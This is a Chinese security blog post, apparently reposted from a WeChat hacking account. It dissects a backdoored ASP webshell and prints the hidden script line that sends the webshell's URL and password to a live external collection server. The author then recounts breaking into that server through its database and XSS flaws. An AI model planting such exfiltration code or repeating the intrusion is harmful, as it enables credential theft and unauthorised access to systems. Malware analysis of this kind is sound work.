勤快学

黑吃黑:优雅爆菊小黑webshell后门箱子

黑白之道  标签:webshell    发布于:2017年05月23日


前因:



在群内看到有人分享免杀木马


第一感觉哪有这种好事,于是下载下来开始分析



用编辑器打开开始读代码


我们可以看到第三行代码如下:



代码为:

UserPass="admin123"  '密码


一般WEB端后门大多都是会发送当前webshell地址+密码然后到webshell箱子,直接跟随UserPass变量



代码内容为:

j"<script src=""http://121.50.168.146:8080/api.asp?url="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>"


后门地址为:

http://121.50.168.146:8080/


接收参数就是当前URL地址+密码,直接GET传输到api.asp



后门是早已泛滥的孤狼webshell箱子系统。


此箱子存在各种XSS漏洞,随便插一下拿到cookie就可以进后台。但是我们不需要这么麻烦。




直接下载数据库,然后爆菊花,后台管理账户密码如下:



webshell箱子数据如下:



欢迎吐槽

        路人甲:妈蛋好歹后门地址接收的加密一下啊!

        路人乙:LOW B后门,被搞是迟早的事情。


文章出处:全球被黑站点统计

你会喜欢


webshell 提权方法 服务器提权教程

拿webshell方法总结

Webshell安全检测篇


亲喜欢吗?记得点赞 | 留言 | 分享


长按公众号,可“ 置顶 ”

----------------------------------

要闻,干货,原创,专业
关注“黑白之道”微信:i77169 
华夏黑客同盟我们坚持,自由,免费,共享!



上一篇:CISO如何回答CEO提出的高难度问题?

下一篇:Elasticsearch学习笔记(二)Elasticsearch入门